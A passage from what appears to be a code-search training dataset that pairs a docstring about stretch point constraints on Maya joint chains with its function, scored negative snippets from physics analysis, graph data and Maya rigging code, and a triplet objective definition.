used to restrict the distribution of random connections\r\n # compute the sum of the elements in each row giving the number of KCs each PN projects to.\r\n pn2kc_sum = pn2kc.sum(axis=0)\r\n dispersion[trial] = pn2kc_sum.max() - pn2kc_sum.min()\r\n # pn_mean = pn2kc_sum.mean()\r\n\r\n # Check if the number of projections per PN is balanced (min max less than baseline)\r\n # if the dispersion is below the baseline accept the sample\r\n if dispersion[trial] <= baseline: return pn2kc\r\n\r\n # cache the pn2kc with the least dispersion\r\n if best_pn2kc is None or dispersion[trial] < dispersion[:trial].min():\r\n best_pn2kc = pn2kc\r\n\r\n # if non of the samples have dispersion lower than the baseline,\r\n # return the less dispersed one\r\n return best_pn2kc", "def SecondPart():\n return countAllBagsIn(targetBag, organizedBags)", "def check_BDT_simulations_slice_KS(bolo_name, analysis_type, mass):\n\n\tplt.ion()\n\n\tpop_path = \"../Analyse_\" + bolo_name + \"/Populations/Pop_for_scaling/\"\n\tBDT_path = \"/home/irfulx204/mnt/tmain/Desktop/Run308_BDT_simu_better/BDT_\" + bolo_name + \"/\" + analysis_type + \"/\"\n\n\tttrue,ftrue = PyRPl.open_ROOT_object(\"../Fond_ERA_merged/\" + bolo_name + \"_\" + analysis_type + \"_lowmass_fond.root\", \"t_merged\")\n\ttsimu, fsimu = PyRPl.open_ROOT_object(BDT_path +\"True_events/ROOT_files/\" + bolo_name + \"_true_events_tree.root\", \"t_new0\")\n\n\tprint \"true: \", ttrue.GetEntries(\"EIB>2 && EID>2 && abs(EIB-EID)<1 && abs(EIB-EC1)<4 && EC1>2.0\")\n\tprint \"simu: \", tsimu.GetEntries(\"EIB>2 && EID>2 && abs(EIB-EID)<1 && abs(EIB-EC1)<4 && EC1>2.0\")\n\n\tttrue.Draw(\"0.5*(EIB+EID):0.5*(EC1+EC2)>>hist(1000,-2,15,1000,-2,15\", \"\")\n\ttsimu.Draw(\"0.5*(EIB+EID):0.5*(EC1+EC2)>>hist2(1000,-2,15,1000,-2,15\", \"\")\n\n\t# ttrue.Draw(\"0.5*(EIB+EID):0.5*(EC1+EC2)>>hist(1000,-2,15,1000,-2,15\", \"EIB>2 && EID>2 && abs(EIB-EID)<1 && abs(EIB-EC1)<4 && EC1>2.0\")\n\t# tsimu.Draw(\"0.5*(EIB+EID):0.5*(EC1+EC2)>>hist2(1000,-2,15,1000,-2,15\", \"EIB>2 && EID>2 && abs(EIB-EID)<1 && abs(EIB-EC1)<4 && EC1>2.0\")\n\t# ttrue.Draw(\"0.414*EIB+(1-0.414)*EID:0.574*EC1+(1-0.574)*EC2>>hist(1000,-2,15,1000,-2,15\", \"EIB>2 && EID>2 && abs(EIB-EID)<1 && abs(EIB-EC1)<4 && EC1>2.0 && EIA<2 && EIC<2\")\n\t# tsimu.Draw(\"0.414*EIB+(1-0.414)*EID:0.574*EC1+(1-0.574)*EC2>>hist2(1000,-2,15,1000,-2,15\", \"EIB>2 && EID>2 && abs(EIB-EID)<1 && abs(EIB-EC1)<4 && EC1>2.0\")\n\n\t# ttrue.Draw(\"EIB:EID>>hist(1000,-2,15,1000,-2,15\", \"EIB>2 && EID>2 && abs(EIB-EID)<1 && abs(EIB-EC1)<4 && EC1>2.0 && EIA<2 && EIC<2\")\n\t# tsimu.Draw(\"EIB:EID>>hist2(1000,-2,15,1000,-2,15\", \"EIB>2 && EID>2 && abs(EIB-EID)<1 && abs(EIB-EC1)<4 && EC1>2.0\")\n\t# ttrue.Draw(\"EC1:EC2>>hist(1000,-2,15,1000,-2,15\", \"EIB>2 && EID>2 && abs(EIB-EID)<1 && abs(EIB-EC1)<4 && EC1>2.0 && EIA<2 && EIC<2\")\n\t# tsimu.Draw(\"EC1:EC2>>hist2(1000,-2,15,1000,-2,15\", \"EIB>2 && EID>2 && abs(EIB-EID)<1 && abs(EIB-EC1)<4 && EC1>2.0\")\n\n\thist.SetMarkerColor(kRed)\n\thist.SetMarkerStyle(20)\n\thist2.SetMarkerStyle(20)\n\thist.Draw()\n\thist2.Draw(\"same\")\n\n\traw_input()\n\n\t#Open event files\n\tdata_types = {\"names\": (\"EC1\", \"EC2\", \"EIA\", \"EIB\", \"EIC\", \"EID\"), \"formats\": (\"f\", \"f\", \"f\", \"f\", \"f\", \"f\")}\n\n\tarr_true = np.loadtxt(pop_path + bolo_name + \"_true_events_all.txt\", delimiter=\",\", dtype=data_types)\n\tarr_simu = np.loadtxt(pop_path + bolo_name + \"_simu_events_all.txt\", delimiter=\",\", dtype=data_types)\n\n\tEI_true = 0.5*(arr_true[\"EIB\"]+arr_true[\"EID\"])\n\tEC_true = 
0.5*(arr_true[\"EC1\"]+arr_true[\"EC2\"])\n\n\tEI_simu = 0.5*(arr_simu[\"EIB\"]+arr_simu[\"EID\"])\n\tEC_simu = 0.5*(arr_simu[\"EC1\"]+arr_simu[\"EC2\"])\n\n\th2Darr = TH2F(\"h2Darr\", \"h2Darr\", 1000, -2, 15, 1000, -2, 15)\n\th2Dsimu = TH2F(\"h2Dsimu\", \"h2Dsimu\", 1000, -2, 15, 1000, -2, 15)\n\n\tfor i in range(EI_true.shape[0]):\n\t\th2Darr.Fill(EC_true[i], EI_true[i])\n\tfor i in range(EI_simu.shape[0]):\n\t\th2Dsimu.Fill(EC_simu[i],EI_simu[i])\n\n\tPyRPl.process_TH2(h2Darr, X_title = \"EC\", Y_title = \"EI\", color = kRed)\n\tPyRPl.process_TH2(h2Dsimu, X_title = \"EC\", Y_title = \"EI\", color = kBlack)\n\n\th2Darr.Draw()\n\th2Dsimu.Draw(\"same\")\n\n\t#Slices on EC\n\tfor EC in range(2,15):\n\t\tl_true = np.where(np.logical_and(EC_true>EC-1 , EC_true<EC))\n\t\tl_simu = np.where(np.logical_and(EC_simu>EC-1 , EC_simu<EC))\n\n\t\tslice_EI_true = EI_true[l_true]\n\t\tslice_EI_simu = EI_simu[l_simu]\n\n\t\tprint scipy.stats.ks_2samp(slice_EI_true, slice_EI_simu),\" \", 1.36*sqrt(len(slice_EI_true) + len(slice_EI_simu))/sqrt(len(slice_EI_true) * len(slice_EI_simu))\n\n\t\ttrue_cdf = sm.distributions.ECDF(slice_EI_true)\n\t\tsimu_cdf = sm.distributions.ECDF(slice_EI_simu)\n\n\t\tx_true = np.linspace(min(slice_EI_true), max(slice_EI_true))\n\t\tx_simu = np.linspace(min(slice_EI_simu), max(slice_EI_simu))\n\t\ty_true = true_cdf(x_true)\n\t\ty_simu = simu_cdf(x_simu)\n\n\t\tplt.step(x_true, y_true, \"r\", label = \"True IonFid CDF @ EC in [\" + str(EC-1) + \",\" + str(EC) + \"]\" )\n\t\tplt.step(x_simu, y_simu, \"k\", label = \"Simu IonFid CDF @ EC in [\" + str(EC-1) + \",\" + str(EC) + \"]\")\n\t\tplt.legend(loc=\"upper left\", prop={\"size\":10})\n\n\t\tplt.show()\n\t\traw_input()\n\t\tplt.clf()\n\n\t#Slices on EI\n\tfor EI in range(1,15):\n\t\tl_true = np.where(np.logical_and(EI_true>EI-1 , EI_true<EI))\n\t\tl_simu = np.where(np.logical_and(EI_simu>EI-1 , EI_simu<EI))\n\n\t\tslice_EC_true = EC_true[l_true]\n\t\tslice_EC_simu = EC_simu[l_simu]\n\n\t\tprint scipy.stats.ks_2samp(slice_EC_true, slice_EC_simu),\" \", 1.36*sqrt(len(slice_EC_true) + len(slice_EC_simu))/sqrt(len(slice_EC_true) * len(slice_EC_simu))\n\n\t\ttrue_cdf = sm.distributions.ECDF(slice_EC_true)\n\t\tsimu_cdf = sm.distributions.ECDF(slice_EC_simu)\n\n\t\tx_true = np.linspace(min(slice_EC_true), max(slice_EC_true))\n\t\tx_simu = np.linspace(min(slice_EC_simu), max(slice_EC_simu))\n\t\ty_true = true_cdf(x_true)\n\t\ty_simu = simu_cdf(x_simu)\n\n\t\tplt.step(x_true, y_true, \"r\", label = \"True IonFid CDF @ EI in [\" + str(EI-1) + \",\" + str(EI) + \"]\" )\n\t\tplt.step(x_simu, y_simu, \"k\", label = \"Simu IonFid CDF @ EI in [\" + str(EI-1) + \",\" + str(EI) + \"]\")\n\t\tplt.legend(loc=\"upper left\", prop={\"size\":10})\n\n\t\tplt.show()\n\t\traw_input()\n\t\tplt.clf()", "def karate_club(metadata: bool = False) -> Union[sparse.csr_matrix, Bunch]:\n row = np.array(\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1,\n 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 3, 3,\n 3, 4, 4, 5, 5, 5, 6, 8, 8, 8, 9, 13, 14, 14, 15, 15, 18,\n 18, 19, 20, 20, 22, 22, 23, 23, 23, 23, 23, 24, 24, 24, 25, 26, 26,\n 27, 28, 28, 29, 29, 30, 30, 31, 31, 32])\n col = np.array(\n [1, 2, 3, 4, 5, 6, 7, 8, 10, 11, 12, 13, 17, 19, 21, 31, 2,\n 3, 7, 13, 17, 19, 21, 30, 3, 7, 8, 9, 13, 27, 28, 32, 7, 12,\n 13, 6, 10, 6, 10, 16, 16, 30, 32, 33, 33, 33, 32, 33, 32, 33, 32,\n 33, 33, 32, 33, 32, 33, 25, 27, 29, 32, 33, 25, 27, 31, 31, 29, 33,\n 33, 31, 33, 32, 33, 32, 33, 32, 33, 33])\n adjacency = sparse.csr_matrix((np.ones(len(row), dtype=bool), 
(row, col)), shape=(34, 34))\n adjacency = sparse.csr_matrix(adjacency + adjacency.T, dtype=bool)\n\n if metadata:\n labels = np.array(\n [1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 0, 0, 1, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])\n x = np.array(\n [0.04, 0.24, 0.01, 0.13, 0.02, -0.08, 0.04, 0.21, 0.08, -0.11, -0.13, -0.28, 0.2, 0.08,\n 0.23, 0.06, -0.06, 0.32, 0.15, 0.19, 0.27, 0.39, -0.04, -0.26, -0.51, -0.49, -0.19, -0.28,\n -0.11, -0.17, 0.22, -0.21, 0.03, 0])\n y = np.array(\n [-0.33, -0.15, -0.01, -0.28, -0.64, -0.75, -0.76, -0.25, 0.09, 0.23, -0.62, -0.4, -0.53, -0.07,\n 0.55, 0.64, -1., -0.42, 0.6, -0.01, 0.45, -0.34, 0.61, 0.41, 0.14, 0.28, 0.68, 0.21,\n 0.12, 0.54, 0.19, 0.09, 0.38, 0.33])\n graph = Bunch()\n graph.adjacency = adjacency\n graph.labels = labels\n graph.position = np.vstack((x, y)).T\n graph.name = 'karate_club'\n return graph\n else:\n return adjacency", "def find_nb(self, ox1, atoms, r1, r2):\n nb_check = [{}, \"\"]\n for k in atoms:\n dox = Vector.length(ox1[1][1] - atoms[k][1])\n if (k != ox1[0] and ox1[1][2] != atoms[k][2] and\n dox <= (r1 + r2)):\n nb_check[0][k] = atoms[k]\n if dox <= r2:\n nb_check[1] = ''.join([nb_check[1], atoms[k][0]])\n return nb_check", "def constraint_B_k_invis(self):\n ms = self.ms\n width_contr = 0.0\n\n # Make sure scalar mass doesn't fall outside of kinematic bounds\n if np.any([s[0] <= ms**2 <= s[1] for s in B_k_invis_obs.s_bounds]):\n widths_s = self.partial_widths()\n width_s = widths_s[\"total\"]\n width_s_sm = width_s - widths_s[\"x x\"] # Gamma_{S->SM}\n\n # Magnitude of S' 3-momentum\n ps = np.sqrt(\n (mB - mk - ms) * (mB + mk - ms) * (mB - mk + ms) * (mB + mk + ms)\n ) / (2.0 * mB)\n # Probability that S decays outside the detector\n pr_invis = np.exp(-B_k_invis_obs.r_max * cm_to_inv_MeV * width_s * ms / ps)\n\n # Compute the total contribution to the invisible decay width\n width_contr = (\n self.width_B_k_s() * (widths_s[\"x x\"] + pr_invis * width_s_sm) / width_s\n )\n\n return B_k_invis_obs.width_bound - width_contr" ]
[ "0.5314263", "0.5311153", "0.5255831", "0.5082965", "0.50570154", "0.4981262", "0.49758726", "0.4932032", "0.49083376", "0.49006724", "0.48869604", "0.4875669", "0.4868179", "0.48634484", "0.48508698", "0.48497802", "0.48386258", "0.4834771", "0.48233885", "0.48123473", "0.4800969", "0.47846892", "0.4779808", "0.4777222", "0.47758475", "0.47743738", "0.47689503", "0.47672373", "0.47251853", "0.4704321", "0.46871138", "0.46726686", "0.46650255", "0.4660924", "0.46592376", "0.46442923", "0.46346065", "0.4634003", "0.46242332", "0.46181834", "0.4612813", "0.4611873", "0.46087605", "0.4605151", "0.45981938", "0.4596615", "0.45931402", "0.45895904", "0.45850706", "0.4581507", "0.45800897", "0.4579808", "0.45776066", "0.45769393", "0.45766032", "0.45730895", "0.45715412", "0.4568879", "0.45599315", "0.45566228", "0.45515606", "0.45510364", "0.45500574", "0.45465508", "0.454163", "0.45384535", "0.45315588", "0.45292556", "0.45273432", "0.45234594", "0.45232823", "0.45210198", "0.45190492", "0.45180315", "0.45167825", "0.45146626", "0.45143732", "0.45106146", "0.45104134", "0.45075592", "0.45075592", "0.45067587", "0.4504495", "0.45030448", "0.45027062", "0.45008263", "0.44980514", "0.44938853", "0.44926026", "0.449229", "0.44912922", "0.44903773", "0.44902602", "0.44869214", "0.4484275", "0.44775712", "0.4474466", "0.4471736", "0.44700104", "0.4468887", "0.4468646" ]
0.0
-1
Create stretch point constraints on a chain of stretch joints.
def stretch_twist_jnts(start_jnt, end_jnt, twist_jnts):

    div = 1.0 / (len(twist_jnts)+1)

    for i, joint in enumerate(twist_jnts):
        weight = div*(i+1)
        mc.pointConstraint(start_jnt, joint, weight=1.0-weight)
        mc.pointConstraint(end_jnt, joint, weight=weight)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def multi_joint_stretch(ik_ctrl, ik_last_node, switch_ctrl, fk_ctrls, jnts, ik_handle):\n\n root_grp = utils.get_parent(jnts[0])\n stretch_jnts = jnts[1:]\n stretch_fk_ctrls = fk_ctrls[1:]\n\n # create attrs\n attrs = ['upStretch','loStretch']\n for i in reversed(range(len(stretch_jnts)-2)):\n ltr = ''\n if i > 0:\n ltr = utils.letters[i]\n\n attrs.insert(1, 'midStretch'+ltr)\n\n if not mc.objExists(ik_ctrl+'.autoStretch'):\n mc.addAttr(ik_ctrl, ln='autoStretch', at='double', min=0, max=1, k=1)\n\n for i in range(len(stretch_jnts)):\n if not mc.objExists(ik_ctrl+'.'+attrs[i]):\n mc.addAttr(ik_ctrl, ln=attrs[i], at='double', dv=1, min=0.001, k=1)\n\n for fk_ctrl in fk_ctrls[:-1]:\n if not mc.objExists(fk_ctrl+'.stretch'):\n mc.addAttr(fk_ctrl, ln='stretch', at='double', dv=1, min=0.001, k=1)\n\n # store initial length of joint\n init_lengths = [mc.getAttr(j+'.tx') for j in stretch_jnts]\n abs_init_lengths = [abs(v) for v in init_lengths]\n\n total_init_length = 0\n for v in init_lengths:\n total_init_length += v\n\n abs_total_init_length = abs(total_init_length)\n\n # Create dist reader\n root_to_end_dist = utils.create_distance_reader(root_grp, ik_last_node)\n\n auto_stretch_clamp = mc.createNode('clamp')\n mc.setAttr(auto_stretch_clamp+'.minR', 1)\n mc.setAttr(auto_stretch_clamp+'.maxR', 10000000)\n mc.connectAttr(root_to_end_dist+'.stretchFactor', auto_stretch_clamp+'.inputR')\n\n mc.addAttr(ik_ctrl, ln='stretchFactor', k=0)\n mc.connectAttr(auto_stretch_clamp+'.inputR', ik_ctrl+'.stretchFactor')\n\n pma = mc.createNode('plusMinusAverage')\n utils.connect_abs(pma+'.output1D', root_to_end_dist+'.jointChainLength')\n\n # handle soft ik handle constraint override\n pc = mc.pointConstraint(ik_last_node, ik_handle)[0]\n if mc.objExists(jnts[0]+'.softIkChainLength'):\n\n # compensate chain length - feed in new chain length for soft ik chain length\n utils.connect_abs(pma+'.output1D', jnts[0]+'.softIkChainLength')\n\n # blend off the soft ik constraint IF im in auto stretch\n mc.connectAttr(ik_ctrl+'.autoStretch', pc+'.w1')\n utils.connect_reverse(pc+'.w1', pc+'.w0')\n\n # easy stuff first - create fk stretch nodes\n fk_to_ik_blends = [] # This is the final output for IK stretch\n\n for i, jnt in enumerate(stretch_jnts):\n\n # easy stuff first - create fk stretch nodes\n fk_mdl = mc.createNode('multDoubleLinear')\n mc.setAttr(fk_mdl+'.input1', mc.getAttr(jnt+'.tx'))\n mc.connectAttr(fk_ctrls[i]+'.stretch', fk_mdl+'.input2')\n utils.connect_abs(fk_mdl+'.output', fk_ctrls[i+1]+'_ZERO.tx')\n\n # Create user secifed IK stretch\n user_ik_scale_mdl = mc.createNode('multDoubleLinear')\n mc.setAttr( user_ik_scale_mdl+'.input1', init_lengths[i])\n mc.connectAttr(ik_ctrl+'.'+attrs[i], user_ik_scale_mdl+'.input2')\n\n # Now create the IK auto stretch nodes\n auto_stretch_mdl = mc.createNode('multDoubleLinear')\n mc.connectAttr(user_ik_scale_mdl+'.output', auto_stretch_mdl+'.input1', f=1)\n mc.connectAttr(auto_stretch_clamp+'.outputR', auto_stretch_mdl+'.input2', f=1)\n mc.connectAttr(user_ik_scale_mdl+'.output', '{0}.input1D[{1}]'.format(pma, i))\n\n fk_to_ik_blend = mc.createNode('blendTwoAttr')\n auto_stretch_blend = mc.createNode('blendTwoAttr')\n\n mc.connectAttr(switch_ctrl+'.IK', fk_to_ik_blend+'.attributesBlender')\n mc.connectAttr(fk_mdl+'.output', fk_to_ik_blend+'.input[0]')\n mc.connectAttr(auto_stretch_blend+'.output', fk_to_ik_blend+'.input[1]')\n\n mc.connectAttr(ik_ctrl+'.autoStretch', auto_stretch_blend+'.attributesBlender')\n mc.connectAttr(user_ik_scale_mdl+'.output', 
auto_stretch_blend+'.input[0]')\n mc.connectAttr(auto_stretch_mdl+'.output', auto_stretch_blend+'.input[1]')\n\n fk_to_ik_blends.append(fk_to_ik_blend+'.output')\n\n for i, jnt in enumerate(stretch_jnts):\n mc.connectAttr(fk_to_ik_blends[i], jnt+'.tx')", "def gripStretchQgsLineStringGeometry(geom, basePt, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve):\n obj = qad_utils.whatGeomIs(0, geom)\n if (type(obj) != list and type(obj) != tuple):\n objType = obj.whatIs()\n if objType == \"CIRCLE\": # se é cerchio\n newCircle = gripStretchCircle(obj, basePt, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve)\n if newCircle is not None:\n return QgsGeometry.fromPolyline(newCircle.asPolyline(tolerance2ApproxCurve))\n elif objType == \"ARC\": # se é arco\n newArc = gripStretchArc(obj, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve)\n if newArc is not None:\n return QgsGeometry.fromPolyline(newArc.asPolyline(tolerance2ApproxCurve))\n return None\n \n linearObjectListToStretch = qad_utils.QadLinearObjectList()\n linearObjectListToStretch.fromPolyline(geom.asPolyline())\n \n atPart = 0\n while atPart < linearObjectListToStretch.qty():\n linearObject = linearObjectListToStretch.getLinearObjectAt(atPart) \n if linearObject.isSegment():\n pt = linearObject.getStartPt()\n if isPtContainedForStretch(pt, ptListToStretch): # se il punto è contenuto in ptListToStretch\n # cambio punto iniziale \n pt.setX(pt.x() + offSetX)\n pt.setY(pt.y() + offSetY)\n linearObject.setStartPt(pt)\n \n pt = linearObject.getEndPt()\n if isPtContainedForStretch(pt, ptListToStretch): # se il punto è contenuto in ptListToStretch\n # cambio punto finale\n pt.setX(pt.x() + offSetX)\n pt.setY(pt.y() + offSetY)\n linearObject.setEndPt(pt)\n else: # se è arco\n newArc, newInverseFlag = gripStretchArc(linearObject.getArc(), ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve, linearObject.isInverseArc())\n if newArc is None:\n return None\n linearObject.setArc(newArc, newInverseFlag)\n\n atPart = atPart + 1\n \n pt = linearObjectListToStretch.getCentroid(tolerance2ApproxCurve) # verifico se polilinea ha un centroide\n if pt is not None:\n if isPtContainedForStretch(pt, ptListToStretch): # se il punto è contenuto in ptListToStretch\n linearObjectListToStretch.move(offSetX, offSetY)\n \n pts = linearObjectListToStretch.asPolyline(tolerance2ApproxCurve)\n stretchedGeom = QgsGeometry.fromPolyline(pts) \n \n return stretchedGeom", "def ar_addStretchSquash():\n setupName = 'Nose'\n sel = cmds.ls(sl=True)\n chain = cmds.ls(sel[0], dag=True, typ='joint')\n IKSpine = cmds.ikHandle(sj=chain[0], ee=chain[len(chain) - 1], sol='ikSplineSolver')\n # rename\n cmds.rename(IKSpine[0], 'IKSplineHandle_' + setupName)\n cmds.rename(IKSpine[1], 'IKSplineEff_' + setupName)\n cmds.rename(IKSpine[2], 'IKSplineCurve_' + setupName)\n # create new joints.\n cmds.select(cl=True)\n bindStartJt = cmds.joint(n='JtCrvBind01')\n cmds.select(cl=True)\n bindEndJt = cmds.joint(n='JtCrvBind02')\n cmds.delete(cmds.parentConstraint(chain[0], bindStartJt))\n cmds.delete(cmds.parentConstraint(chain[len(chain) - 1], bindEndJt))\n\n cmds.skinCluster(bindStartJt, bindEndJt, 'IKSplineCurve_' + setupName, bm=0, sm=0, nw=1, wd=0, mi=2)\n ctlStart = cmds.circle(nr=[1, 0, 0], n='Toony' + setupName + '01_CTRL', ch=False)\n extraGrp = cmds.createNode('transform', n='Toony' + setupName + '01ExtraGrp')\n offGrp = cmds.createNode('transform', n='Toony' + setupName + '01OffsetGrp')\n cmds.parent(ctlStart[0], extraGrp)\n cmds.parent(extraGrp, offGrp)\n 
cmds.delete(cmds.parentConstraint(bindStartJt, offGrp))\n # endJOint\n ctlEnd = cmds.circle(nr=[1, 0, 0], n='Toony' + setupName + '02_CTRL', ch=False)\n extraGrpEnd = cmds.createNode('transform', n='Toony' + setupName + '02ExtraGrp')\n offGrpEnd = cmds.createNode('transform', n='Toony' + setupName + '02OffsetGrp')\n cmds.parent(ctlEnd[0], extraGrpEnd)\n cmds.parent(extraGrpEnd, offGrpEnd)\n cmds.delete(cmds.parentConstraint(bindEndJt, offGrpEnd))\n # parent constraint wiht bind joints.\n cmds.parentConstraint(ctlStart[0], bindStartJt)\n cmds.parentConstraint(ctlEnd[0], bindEndJt)\n # Create connection with node basis.\n crvInfo = cmds.createNode('curveInfo', n='curveInfo_Toony' + setupName)\n shpCrv = cmds.listRelatives('IKSplineCurve_' + setupName, s=True)\n cmds.connectAttr(shpCrv[0] + '.worldSpace[0]', crvInfo + '.inputCurve', f=True)\n mdnForSX = cmds.createNode('multiplyDivide', n='multiplyDivide_Toony' + setupName + '_ScaleX')\n mdnForPW = cmds.createNode('multiplyDivide', n='multiplyDivide_Toony' + setupName + '_Power')\n mdnForYZ = cmds.createNode('multiplyDivide', n='multiplyDivide_Toony' + setupName + '_ScaleYZ')\n cmds.setAttr(mdnForSX + '.operation', 2)\n cmds.setAttr(mdnForPW + '.operation', 3)\n cmds.setAttr(mdnForYZ + '.operation', 2)\n # connections.\n cmds.connectAttr(crvInfo + '.arcLength', mdnForSX + '.input1X', f=True)\n cmds.setAttr(mdnForSX + '.input2X', cmds.getAttr(mdnForSX + '.input1X'))\n scaledJoint = chain[:-1]\n for each in scaledJoint:\n cmds.connectAttr(mdnForSX + '.outputX', each + '.sx', f=True)\n # power connections.\n cmds.connectAttr(mdnForSX + '.outputX', mdnForPW + '.input1X', f=True)\n cmds.setAttr(mdnForPW + '.input2X', 0.5)\n cmds.connectAttr(mdnForPW + '.outputX', mdnForYZ + '.input2X', f=True)\n cmds.setAttr(mdnForYZ + '.input1X', 1)\n for each in scaledJoint:\n cmds.connectAttr(mdnForYZ + '.outputX', each + '.sy')\n cmds.connectAttr(mdnForYZ + '.outputX', each + '.sz')\n # TODO: need to full proof this function.", "def biped_stretch(ik_ctrl,\n ik_last_node,\n pv_ctrl,\n switch_ctrl,\n up_arm_fk_ctrl,\n lo_arm_fk_ctrl,\n wrist_fk_ctrl,\n up_arm_ik_jnt,\n lo_arm_ik_jnt,\n wrist_ik_jnt,\n ik_handle,\n pin_attr_name='pinElbow',\n shift_attr_name='shiftElbow'):\n\n # add all my attrs on ctrls\n mc.addAttr(ik_ctrl, ln=pin_attr_name, at='double', min=0, max=1, k=1)\n mc.addAttr(ik_ctrl, ln=shift_attr_name, at='double', min=-1, max=1, k=1)\n\n mc.addAttr(ik_ctrl, ln='autoStretch', at='double', min=0, max=1, k=1)\n mc.addAttr(ik_ctrl, ln='upStretch', at='double', dv=1, min=0.001, k=1)\n mc.addAttr(ik_ctrl, ln='loStretch', at='double', dv=1, min=0.001, k=1)\n\n mc.addAttr(up_arm_fk_ctrl, ln='stretch', at='double', dv=1, min=0.001, k=1)\n mc.addAttr(lo_arm_fk_ctrl, ln='stretch', at='double', dv=1, min=0.001, k=1)\n\n # store initial length of joint\n lo_init_length = mc.getAttr(lo_arm_ik_jnt+'.tx')\n wrist_init_length = mc.getAttr(wrist_ik_jnt+'.tx')\n max_init_length = mc.getAttr(lo_arm_ik_jnt+'.tx')+mc.getAttr(wrist_ik_jnt+'.tx')\n\n lo_abs_init_length = abs(mc.getAttr(lo_arm_ik_jnt+'.tx'))\n wrist_abs_length = abs(mc.getAttr(wrist_ik_jnt+'.tx'))\n\n # Get parents for ik handle and root of the parm\n arm_root_grp = utils.get_parent(up_arm_ik_jnt)\n\n # Create distance nodes between base, end, and pv ctrl to get the length of side of the triangle\n root_to_end_dist = utils.create_distance_reader(arm_root_grp, ik_last_node)\n root_to_pv_dist = utils.create_distance_reader(arm_root_grp, pv_ctrl)\n pv_to_end_dist = utils.create_distance_reader(pv_ctrl, 
ik_last_node)\n\n # easy stuff first - create fk stretch nodes\n lo_arm_fk_mdl = mc.createNode('multDoubleLinear')\n wrist_fk_mdl = mc.createNode('multDoubleLinear')\n\n mc.setAttr(lo_arm_fk_mdl+'.input1', mc.getAttr(lo_arm_ik_jnt+'.tx'))\n mc.setAttr(wrist_fk_mdl+'.input1', mc.getAttr(wrist_ik_jnt+'.tx'))\n mc.connectAttr(up_arm_fk_ctrl+'.stretch', lo_arm_fk_mdl+'.input2')\n mc.connectAttr(lo_arm_fk_ctrl+'.stretch', wrist_fk_mdl+'.input2')\n\n utils.connect_abs(lo_arm_fk_mdl+'.output', lo_arm_fk_ctrl+'_ZERO.tx')\n if wrist_fk_ctrl and mc.objExists(wrist_fk_ctrl):\n utils.connect_abs(wrist_fk_mdl+'.output', wrist_fk_ctrl+'_ZERO.tx')\n\n # These arethe final fk stretch outputs to connect to joints\n fk_stretch_final_output = [lo_arm_fk_mdl+'.output', wrist_fk_mdl+'.output']\n\n # NOW creates node s for thew elbow pin\n lo_arm_pin_mdl = mc.createNode('multDoubleLinear')\n wrist_pin_mdl = mc.createNode('multDoubleLinear')\n\n mc.setAttr(lo_arm_pin_mdl+'.input1', 1)\n mc.setAttr(wrist_pin_mdl+'.input1', 1)\n\n if lo_init_length < 0.0:\n mc.setAttr(lo_arm_pin_mdl+'.input1', -1)\n\n if wrist_init_length < 0.0:\n mc.setAttr(wrist_pin_mdl+'.input1', -1)\n\n mc.connectAttr(root_to_pv_dist+'.localDistance', lo_arm_pin_mdl+'.input2')\n mc.connectAttr(pv_to_end_dist+'.localDistance', wrist_pin_mdl+'.input2')\n\n # These arethe final elbow pin stretch outputs to connect to joints\n pin_final_output = [lo_arm_pin_mdl+'.output', wrist_pin_mdl+'.output']\n\n # create shift nodes\n mc.addAttr(lo_arm_ik_jnt, ln='shiftLength', k=1)\n mc.addAttr(wrist_ik_jnt, ln='shiftLength', k=1)\n\n tt = 'linear'\n mc.setDrivenKeyframe(lo_arm_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=0, v=lo_init_length, itt=tt, ott=tt)\n mc.setDrivenKeyframe(lo_arm_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=1, v=0, itt=tt, ott=tt)\n mc.setDrivenKeyframe(lo_arm_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=-1, v=max_init_length, itt=tt, ott=tt)\n\n mc.setDrivenKeyframe(wrist_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=0, v=wrist_init_length, itt=tt, ott=tt)\n mc.setDrivenKeyframe(wrist_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=1, v=max_init_length, itt=tt, ott=tt)\n mc.setDrivenKeyframe(wrist_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=-1, v=0, itt=tt, ott=tt)\n\n shift_final_output = [ lo_arm_ik_jnt+'.shiftLength', wrist_ik_jnt+'.shiftLength']\n\n # Create ik indivisual stretch nodes\n lo_arm_ik_scale_mdl = mc.createNode('multDoubleLinear')\n wrist_ik_scale_mdl = mc.createNode('multDoubleLinear')\n\n mc.connectAttr(shift_final_output[0], lo_arm_ik_scale_mdl+'.input1')\n mc.connectAttr(shift_final_output[1], wrist_ik_scale_mdl+'.input1')\n mc.connectAttr(ik_ctrl+'.upStretch', lo_arm_ik_scale_mdl+'.input2')\n mc.connectAttr(ik_ctrl+'.loStretch', wrist_ik_scale_mdl+'.input2')\n\n # This is the final output for scale and shift\n ik_stretch_final_output = [lo_arm_ik_scale_mdl+'.output', wrist_ik_scale_mdl+'.output']\n\n # Now create the IK auto stretch nodes\n lo_auto_stretch_mdl = mc.createNode('multDoubleLinear')\n wrist_auto_stretch_mdl = mc.createNode('multDoubleLinear')\n\n auto_stretch_clamp = mc.createNode('clamp')\n mc.setAttr(auto_stretch_clamp+'.minR', 1)\n mc.setAttr(auto_stretch_clamp+'.maxR', 10000000)\n\n mc.connectAttr(ik_stretch_final_output[0], lo_auto_stretch_mdl+'.input1', f=1)\n mc.connectAttr(ik_stretch_final_output[1], wrist_auto_stretch_mdl+'.input1', f=1)\n mc.connectAttr(root_to_end_dist+'.stretchFactor', 
